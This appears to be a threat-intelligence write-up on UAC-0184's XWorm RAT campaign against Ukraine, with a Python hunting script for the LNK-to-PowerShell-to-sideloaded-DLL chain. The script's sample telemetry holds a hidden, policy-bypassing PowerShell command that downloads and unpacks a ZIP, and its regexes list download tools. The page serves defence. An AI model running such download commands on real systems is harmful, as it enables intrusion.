XWorm RAT Malware
A malware campaign targeting Ukraine has been attributed to the UAC-0184 threat actor group. It
continues the group's persistent efforts to compromise Ukrainian entities, this time delivering the
XWorm Remote Access Trojan (RAT). The attackers pair deceptive lure documents with a multi-stage
delivery chain, putting the targeted systems and the data they hold at significant risk.
The infection chain begins with a malicious LNK file delivered in phishing emails. When the LNK file
is opened, it launches a PowerShell script that downloads a ZIP archive containing a mix of legitimate
and malicious Python components, including an encrypted payload. Using DLL sideloading (a
legitimate, signed executable loading an attacker-supplied DLL from the same directory) together
with the Shadowloader technique, the chain ends by executing the final payload, XWorm RAT. XWorm
provides remote access and supports data theft, DDoS attacks and the download of additional
malware. Although the command-and-control (C2) server was inactive at the time of analysis, that
infrastructure can be reactivated or replaced, so the potential for further malicious activity remains
high.
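The chain above leaves a recognisable shape in endpoint telemetry: Explorer spawning a hidden PowerShell that fetches a ZIP, a Python interpreter running from a user-writable directory with PowerShell as its parent, and that interpreter loading an unsigned DLL from the same directory. The hunting logic below is an added example written for this page, not code from the original report or from any vendor; the Sysmon-style field names, the process paths, the `docs.zip` URL on the documentation address 203.0.113.5 and the `python311.dll` file name are all constructed for illustration, not indicators from the campaign.

```python
"""Hunt for the LNK -> PowerShell -> ZIP -> Python/DLL-sideload chain in endpoint telemetry.

Added example for this page. Records mimic Sysmon Event ID 1 (process create) and
Event ID 7 (image load); every path, host name and file name below is constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style)."""
    image: str
    parent_image: str
    command_line: str


@dataclass(frozen=True)
class ImageLoadEvent:
    """Minimal image-load record (Sysmon Event ID 7 style)."""
    image: str      # process that loaded the module
    loaded: str     # full path of the loaded DLL
    signed: bool    # Authenticode signature validated by the sensor


# Directories an unprivileged user (and therefore a phishing payload) can write to.
USER_WRITABLE = re.compile(r"(?i)\\(AppData|Temp|Downloads|Users\\Public|ProgramData)\\")
HIDDEN_WINDOW = re.compile(r"(?i)-w(indowstyle)?\s+h(idden)?\b")
DOWNLOAD_CMD = re.compile(
    r"(?i)\b(iwr|invoke-webrequest|downloadfile|downloadstring|start-bitstransfer|curl|wget)\b")
ZIP_REF = re.compile(r"(?i)\.zip\b")
PYTHON_IMAGE = re.compile(r"(?i)\\pythonw?\.exe$")


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def hunt_process_events(events):
    """Return (rule_name, image) for every process event matching a stage of the chain."""
    hits = []
    for ev in events:
        img, parent, cmd = _basename(ev.image), _basename(ev.parent_image), ev.command_line
        # Stage 1: the user opens the LNK, so Explorer is PowerShell's parent, and the
        # script runs with a hidden window and pulls down a ZIP archive.
        if (img == "powershell.exe" and parent == "explorer.exe"
                and HIDDEN_WINDOW.search(cmd) and DOWNLOAD_CMD.search(cmd)
                and ZIP_REF.search(cmd)):
            hits.append(("lnk_powershell_zip_download", ev.image))
        # Stage 2: the dropped Python interpreter starts from a user-writable directory
        # with PowerShell (not an installer or IDE) as its parent.
        if (PYTHON_IMAGE.search(ev.image) and USER_WRITABLE.search(ev.image)
                and parent == "powershell.exe"):
            hits.append(("python_dropped_in_user_dir", ev.image))
    return hits


def hunt_image_loads(loads):
    """Flag unsigned DLLs that a Python interpreter loads from a user-writable directory:
    the shape DLL sideloading takes when a legitimate pythonw.exe is dropped beside a
    malicious DLL that shadows one of its dependencies."""
    return [("python_unsigned_dll_sideload", ld.loaded) for ld in loads
            if PYTHON_IMAGE.search(ld.image) and USER_WRITABLE.search(ld.loaded)
            and not ld.signed]


# Constructed sample telemetry (assumed paths and names, not real indicators).
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PY_PATH = r"C:\Users\victim\AppData\Local\Temp\docs\pythonw.exe"
SIDELOADED_DLL = r"C:\Users\victim\AppData\Local\Temp\docs\python311.dll"

SAMPLE_PROCS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\winlogon.exe", "explorer.exe"),
    ProcEvent(PS_PATH, r"C:\Windows\explorer.exe",
              r'powershell.exe -w hidden -nop -ep bypass -c "iwr http://203.0.113.5/docs.zip '
              r'-OutFile $env:TEMP\docs.zip; Expand-Archive $env:TEMP\docs.zip $env:TEMP\docs"'),
    ProcEvent(PY_PATH, PS_PATH, "pythonw.exe main.py"),
    # Benign scheduled maintenance script: svchost parent, no hidden window, no download.
    ProcEvent(PS_PATH, r"C:\Windows\System32\svchost.exe",
              r"powershell.exe -File C:\scripts\backup.ps1"),
]

SAMPLE_LOADS = [
    ImageLoadEvent(PY_PATH, SIDELOADED_DLL, signed=False),
    ImageLoadEvent(PY_PATH, r"C:\Windows\System32\kernel32.dll", signed=True),
]

if __name__ == "__main__":
    for hit in hunt_process_events(SAMPLE_PROCS) + hunt_image_loads(SAMPLE_LOADS):
        print("%-30s %s" % hit)
```

Each rule on its own is noisy (administrators do run hidden PowerShell, and developers do keep Python in AppData); the value is in correlating the three within one process tree on one host, which is why each hit carries the image path so it can be joined back to the parent chain.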
UAC-0184's campaign underscores the group's persistent targeting of Ukrainian sectors, with tactics
that keep evolving to evade detection and maintain access to compromised systems. Deploying
XWorm RAT signals an intent to establish durable remote access, an ongoing security risk even
while the observed C2 server is dormant. Organizations are urged to strengthen their defenses against
phishing, in particular by blocking or quarantining LNK attachments and restricting script
execution from user-writable directories, and to stay alert to threats targeting critical infrastructure
and sensitive data.
Threat Profile: